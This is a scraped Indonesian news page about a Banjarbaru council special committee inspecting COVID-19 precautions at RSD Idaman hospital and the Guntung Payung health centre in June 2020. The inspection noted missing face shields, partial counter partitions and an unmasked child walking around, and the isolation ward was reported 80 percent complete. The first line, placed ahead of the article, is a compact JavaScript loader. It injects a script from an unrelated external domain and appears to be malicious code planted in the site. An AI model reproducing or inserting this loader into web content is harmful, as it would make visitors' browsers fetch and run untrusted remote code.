(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: HEADLINE

Cek Penanganan Covid-19 di RSD Idaman, Pansus Dewan Lihat Anak Kecil Berkeliaran di Faskes


KANALKALIMANTAN.COM, BANJARBARU – Panitia Khusus (Pansus) Penanganan Covid-19 anggota DPRD Banjarbaru melakukan sidak meninjau protokol kesehatan yang diterapkan di beberapa fasilitas kesehatan (Faskes), Senin (22/6/2020).

Ketua Pansus Penanganan Covid-19 Nafsiani Samandi bersama sejumlah anggota DPRD Banjarbaru mengecek Rumah Sakit Daerah (RSD) Idaman Banjarbaru terkait pelaksanaan Standar Operasional Prosedur (SOP) Covid-19, pelayanan dalam intensitas kunjungan, hingga progres pembangunan ruang isolasi yang saat ini tengah berjalan.

Pengecekan juga dilakukan di Puskesmas Kelurahan Guntung Payung, Kecamatan Landasan Ulin, di mana wilayah ini paling banyak ditemukan kasus Covid-19.

Sekretaris Pansus Penanganan Covid-19 Emi Lasari kepada Kanalkalimantan mengatakan, ada berbagai catatan yang didapati dalam sidak ini. Seperti masih kurangnya kelengkapan Alat Pelindung Diri (APD) yang dikenakan petugas di RSD Idaman Banjarbaru.

“Petugas yang melakukan pengecekan suhu tubuh pengunjung memang sudah menggunakan masker. Tapi seharusnya dilengkapi lagi dengan face shield -pelindung wajah- melindungi diri dari potensi paparan virus corona melalui mata. Kita lihat petugas di dalam juga kurang APD,” katanya.

Selain itu, Pansus Penanganan Covid-19 DPRD Kota Banjarbaru juga menyorot pembatas sekat di bagian ruang loket pendaftaran yang hanya terpasang sebagian. Padahal, jika dibandingkan di Puskemas Guntung Payung, justru penerapannya lebih bagus.

Terlebih lagi, Emi juga menyayangkan petugas membiarkan ada anak kecil tidak mengenakan masker masuk ke dalam area RSD Idaman Banjarbaru. “Harusnya kondisi seperti itu disiasati, jangan dibiarkan berkeliaran di dalam rumah sakit,” lanjutnya.

Manajeman RSD Idaman Banjarbaru memberi pembatas sekat di bagian ruang loket pendaftaran. foto: rico

Khusus untuk pembangunan ruang isolasi di RSD Idaman Banjarbaru, Pansus Penanganan Covid-19 juga telah menerima laporan perkembangan. Emi mengatakan, pembangunan ruang isolasi telah mencapai 80 persen dan sedang dalam tahap penyelesaian akhir.

“RSD Idaman Banjarbaru inikan menjadi salah satu rumah sakit rujukan pasien Covid-19. Maka dari itu kita ingin ruang isolasi ini secepatnya rampung. Dari data yang kita terima, ruang isolasi diperkirakan mampu menampung 29 pasien,” pungkasnya.

Seluruh hal yang menjadi catatan oleh Pansus Penanganan Covid-19 DPRD Banjarbaru akan dibawa dalam rapat pembahasan. Nantinya, pihak RSD Idaman Banjarbaru maupun Puskesmas Guntung Payung akan turut dihadirkan menindaklanjuti temuan atau kekurangan tersebut. (kanalkalimamtan.com/rico)

Reporter : rico
Editor : bie

 


Al Ghifari

Recent Posts

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

2 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

3 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

5 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

6 jam ago

Hari Ini Masuk Asrama Haji, Kloter 1 Embarkasi Banjarmasin Berangkat Minggu

KANALKALIMANTAN.COM, BANJARBARU - Jelang kedatangan rombongan jemaah Haji Embarkasi Banjarmasin Kloter 1, Sabtu (11/5/2024), Petugas… Read More

6 jam ago

Paman Birin Trophy VII 2024 Digelar 15 Hari di Murdjani

KANALKALIMANTAN.COM, BANJARBARU - Gubernur Kalimantan Selatan H Sahbirin Noor membuka secara resmi Paman Birin Trophy… Read More

8 jam ago

This website uses cookies.